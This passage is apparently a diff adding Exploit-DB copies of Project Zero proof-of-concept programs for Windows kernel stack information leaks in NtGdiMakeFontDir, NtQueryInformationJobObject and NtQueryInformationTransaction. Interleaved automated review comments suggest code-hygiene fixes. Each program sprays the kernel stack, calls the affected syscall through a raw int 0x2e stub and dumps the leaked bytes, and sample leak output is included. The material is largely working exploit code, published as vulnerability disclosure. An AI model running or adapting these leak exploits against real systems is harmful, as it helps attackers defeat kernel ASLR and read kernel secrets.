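+00000030: 00 30 02 00[41 41 41 41]00 30 05 00 00 00 00 00 .0..AAAA.0......
+--- cut ---
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <winternl.h>
+#include <cstdio>
+
+#define ProcessVmCounters ((PROCESSINFOCLASS)3)
+
+typedef struct _VM_COUNTERS_EX {
+SIZE_T PeakVirtualSize;
+SIZE_T VirtualSize;
+ULONG PageFaultCount;
+SIZE_T PeakWorkingSetSize;
+SIZE_T WorkingSetSize;
+SIZE_T QuotaPeakPagedPoolUsage;
+SIZE_T QuotaPagedPoolUsage;
+SIZE_T QuotaPeakNonPagedPoolUsage;
+SIZE_T QuotaNonPagedPoolUsage;
+SIZE_T PagefileUsage;
+SIZE_T PeakPagefileUsage;
+SIZE_T PrivateUsage;
+} VM_COUNTERS_EX;
+
+typedef struct _VM_COUNTERS_EX2 {
+VM_COUNTERS_EX CountersEx;
+SIZE_T PrivateWorkingSetSize;
+ULONGLONG SharedCommitUsage;
+} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2;
+
+extern "C"
+ULONG WINAPI NtMapUserPhysicalPages(
+PVOID BaseAddress,
+ULONG NumberOfPages,
+PULONG PageFrameNumbers
+);
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[4096];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+VM_COUNTERS_EX2 counters;
+ZeroMemory(&counters, sizeof(counters));
+
+SprayKernelStack();
+
+DWORD ReturnLength;
+NTSTATUS st = NtQueryInformationProcess(GetCurrentProcess(), ProcessVmCounters, &counters, sizeof(counters), &ReturnLength);
+if (!NT_SUCCESS(st)) {
+printf("NtQueryInformationProcess failed, %x\n", st);
+return 1;
+}
+
+PrintHex((PBYTE)&counters, ReturnLength);
+
+return 0;
+}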
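Review bot: `DWORD ReturnLength;` in main is left uninitialized, unlike the `DWORD ReturnLength = 0;` used by the sibling PoCs, and its kernel-supplied value is then taken as the read bound in `PrintHex((PBYTE)&counters, ReturnLength)` without being compared against `sizeof(counters)`; should the reported length ever exceed the buffer, PrintHex would read past `counters`. Initialise it and clamp before printing: `DWORD ReturnLength = 0;` and `if (ReturnLength > sizeof(counters)) ReturnLength = sizeof(counters);`. The same unclamped `PrintHex(output, ReturnLength)` call appears in 42228.cpp, 42231.cpp and 42232.cpp, where `output` is likewise a fixed-size array.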
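--- a/platforms/windows/dos/42230.txt
+++ b/platforms/windows/dos/42230.txt
@@ -0,0 +1,32 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1191
+
+We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
+
+The attached proof of concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invoking the affected win32k!NtGdiMakeFontDir syscall. As a result, we can observe that a number of leftover bytes from the stack are indeed leaked to user-mode via the output structure:
+
+--- cut ---
+00000000: 01 00 00 00 00 02 95 00 00 00 57 69 6e 64 6f 77 ..........Window
+00000010: 73 21 20 57 69 6e 64 6f 77 73 21 20 57 69 6e 64 s! Windows! Wind
+00000020: 6f 77 73 21 00 10 03 01 01 00 00 00 00 00 00 00 ows!............
+00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000040: 00 00 00 00 00 00 03 40 00 08 48 00 48 00 66 06 .......@..H.H.f.
+00000050: 00 00 1b 02 00 00 00 f4 01 00 00 00 00 08 07 e8 ................
+00000060: 03 86 02 1f a8 01 02 00 00 00 00 00 00 76 00 00 .............v..
+00000070: 00 08 00 00 00 41 77 69 6e 65 5f 74 65 73 74 00 .....Awine_test.
+00000080: 77 69 6e 65 5f 74 65 73 74 00 4d 65 64 69 75 6d wine_test.Medium
+00000090: 00 41 41 41 41 00 41 41 41 41 41 41 41 41 41 41 .AAAA.AAAAAAAAAA
+000000a0: 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 AAAAAAAAA.AAAAAA
+000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 AAAAAAAAAAAAAAA.
+000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
+000000f0: 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? AAAAAAAAAAA.....
+--- cut ---
+
+In order for the PoC program to work, the attached wine_test.ttf font must be present in the current working directory.
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42230.zip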
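--- a/platforms/windows/dos/42231.cpp
+++ b/platforms/windows/dos/42231.cpp
@@ -0,0 +1,136 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1193
+
+We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 12 information class discloses portions of uninitialized kernel stack memory to user-mode clients.
+
+The specific name of the 12 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, output sizes of 48 and 56 bytes are accepted. In both cases, 4 uninitialized kernel stack bytes are leaked at the end of the structure (at offsets of 0x2C or 0x34, respectively).
+
+The attached proof-of-concept program demonstrates both disclosures by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=12 and the allowed output sizes. An example output is as follows:
+
+--- cut ---
+Class 12, output length 48:
+00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000020: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
+Class 12, output length 56:
+00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000030: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
+--- cut ---
+
+It is clearly visible here that in both responses, 4 bytes copied from ring-0 to ring-3 remained uninitialized.
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <winternl.h>
+#include <cstdio>
+
+extern "C"
+ULONG WINAPI NtMapUserPhysicalPages(
+PVOID BaseAddress,
+ULONG NumberOfPages,
+PULONG PageFrameNumbers
+);
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[4096];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+// Windows 10 1607 32-bit.
+CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
+
+// Create a job object to operate on.
+HANDLE hJob = CreateJobObject(NULL, NULL);
+
+// Spray the kernel stack with a marker value, to get visible results.
+SprayKernelStack();
+
+// Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 48).
+DWORD ReturnLength = 0;
+BYTE output[56] = { /* zero padding */ };
+
+NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 48, &ReturnLength);
+if (!NT_SUCCESS(st)) {
+printf("NtQueryInformationJobObject#1 failed, %x\n", st);
+CloseHandle(hJob);
+return 1;
+}
+
+// Print out the output.
+printf("Class 12, output length 48:\n");
+PrintHex(output, ReturnLength);
+
+// Spray the kernel again before invoking the affected system call.
+SprayKernelStack();
+
+// Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 56).
+ZeroMemory(output, sizeof(output));
+
+st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 56, &ReturnLength);
+if (!NT_SUCCESS(st)) {
+printf("NtQueryInformationJobObject#2 failed, %x\n", st);
+CloseHandle(hJob);
+return 1;
+}
+
+// Print the output again.
+printf("Class 12, output length 56:\n");
+PrintHex(output, ReturnLength);
+
+// Free resources.
+CloseHandle(hJob);
+
+return 0;
+}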
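Review bot: `SystemCall32` has no return statement and nothing explains how its result reaches the `NTSTATUS st = SystemCall32(...)` callers in main; it relies on `int 0x2e` leaving the status in eax and on `lea edx, ApiNumber + 4` addressing the first variadic argument, which only holds for a cdecl 32-bit build. A header comment would stop the next reader from treating the missing `return` as a bug, e.g. `// Raw 32-bit syscall stub: eax = service number, edx = address of the argument block (the cdecl arguments following ApiNumber); the status left in eax by int 0x2e is the return value. 32-bit builds only.` The identical stub is in 42228.cpp and 42232.cpp.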
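--- a/platforms/windows/dos/42232.cpp
+++ b/platforms/windows/dos/42232.cpp
@@ -0,0 +1,112 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1194
+
+We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 28 information class discloses portions of uninitialized kernel stack memory to user-mode clients.
+
+The specific name of the 28 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, an output size of 40 bytes is accepted. At the end of that memory area, 16 uninitialized bytes from the kernel stack are leaked to the client application.
+
+The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=28 and the allowed output size. An example output is as follows:
+
+--- cut ---
+00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: 00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41 ........AAAAAAAA
+00000020: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
+--- cut ---
+
+It is clearly visible here that 16 bytes copied from ring-0 to ring-3 remained uninitialized. If the stack spraying function call is commented out, raw kernel pointers can be observed in the output.
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <winternl.h>
+#include <cstdio>
+
+extern "C"
+ULONG WINAPI NtMapUserPhysicalPages(
+PVOID BaseAddress,
+ULONG NumberOfPages,
+PULONG PageFrameNumbers
+);
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[4096];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+// Windows 10 1607 32-bit.
+CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
+
+// Create a job object to operate on.
+HANDLE hJob = CreateJobObject(NULL, NULL);
+
+// Spray the kernel stack with a marker value, to get visible results.
+SprayKernelStack();
+
+// Trigger the bug in nt!NtQueryInformationJobObject(class 28, output length 40).
+DWORD ReturnLength = 0;
+BYTE output[40] = { /* zero padding */ };
+
+NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 28, output, sizeof(output), &ReturnLength);
+if (!NT_SUCCESS(st)) {
+printf("NtQueryInformationJobObject failed, %x\n", st);
+CloseHandle(hJob);
+return 1;
+}
+
+// Print out the output.
+PrintHex(output, ReturnLength);
+
+// Free resources.
+CloseHandle(hJob);
+
+return 0;
+}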
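--- /dev/null
+++ b/platforms/windows/dos/42233.cpp
@@ -0,0 +1,109 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1196
+
+We have discovered that the nt!NtQueryInformationTransaction system call called with the 1 information class discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10.
+
+The specific name of the 1 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on 32-bit Windows platforms, an output size of 32 bytes and more is accepted. At the end of that memory area, 6 uninitialized bytes from the kernel stack can be leaked to the client application.
+
+The attached proof-of-concept program (specific to Windows 10 1607 32-bit) demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=1 and the allowed output size. An example output is as follows:
+
+--- cut ---
+00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+00000010: 01 00 00 00 00 00 00 00 00 00 41 41 41 41 41 41 ..........AAAAAA
+--- cut ---
+
+It is clearly visible here that 6 bytes copied from ring-0 to ring-3 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <winternl.h>
+#include <KtmW32.h>
+#include <cstdio>
+
+extern "C"
+ULONG WINAPI NtMapUserPhysicalPages(
+PVOID BaseAddress,
+ULONG NumberOfPages,
+PULONG PageFrameNumbers
+);
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+for (ULONG i = 0; i < dwBytes; i += 16) {
+printf("%.8x: ", i);
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes) {
+printf("%.2x ", Data[i + j]);
+}
+else {
+printf("?? ");
+}
+}
+
+for (ULONG j = 0; j < 16; j++) {
+if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+printf("%c", Data[i + j]);
+}
+else {
+printf(".");
+}
+}
+
+printf("\n");
+}
+}
+
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+for (ULONG i = 0; i < size; i++) {
+ptr[i] = byte;
+}
+}
+
+VOID SprayKernelStack() {
+// Buffer allocated in static program memory, hence doesn't touch the local stack.
+static BYTE buffer[4096];
+
+// Fill the buffer with 'A's and spray the kernel stack.
+MyMemset(buffer, 'A', sizeof(buffer));
+NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
+
+// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+// Windows 10 1607 32-bit.
+CONST ULONG __NR_NtQueryInformationTransaction = 0x00b3;
+
+// Create an empty transaction.
+HANDLE hTransaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
+
+// Spray the kernel stack to get visible results.
+SprayKernelStack();
+
+// Trigger the vulnerability and print out the output structure.
+BYTE output[32] = { /* zero padding */ };
+DWORD ReturnLength;
+NTSTATUS st = SystemCall32(__NR_NtQueryInformationTransaction, hTransaction, 1, output, sizeof(output), &ReturnLength);
+
+if (!NT_SUCCESS(st)) {
+printf("NtQueryInformationTransaction failed, %x\n", st);
+CloseHandle(hTransaction);
+return 1;
+}
+
+PrintHex(output, ReturnLength);
+
+// Free resources.
+CloseHandle(hTransaction);
+
+return 0;
+}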
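Review bot: `DWORD ReturnLength;` in main() is left uninitialized and is then passed straight to PrintHex() without ever being compared against the 32-byte `output` buffer, so a length larger than the buffer makes PrintHex() read past the end of `output`. The preceding file in this commit initialises the same variable to 0; this file should match and clamp the dump: `DWORD ReturnLength = 0;` and `PrintHex(output, ReturnLength < sizeof(output) ? ReturnLength : sizeof(output));`. The CreateTransaction() result is also used unchecked even though it returns INVALID_HANDLE_VALUE on failure, so a guard such as `if (hTransaction == INVALID_HANDLE_VALUE) { printf("CreateTransaction failed, %x\n", GetLastError()); return 1; }` would keep a bad handle from being reported as a syscall failure. SystemCall32() reaches its closing brace with no return statement and depends on whatever `int 0x2e` leaves in eax; a comment like `// No explicit return: the status is whatever int 0x2e leaves in eax.` would make that deliberate rather than look like an omission.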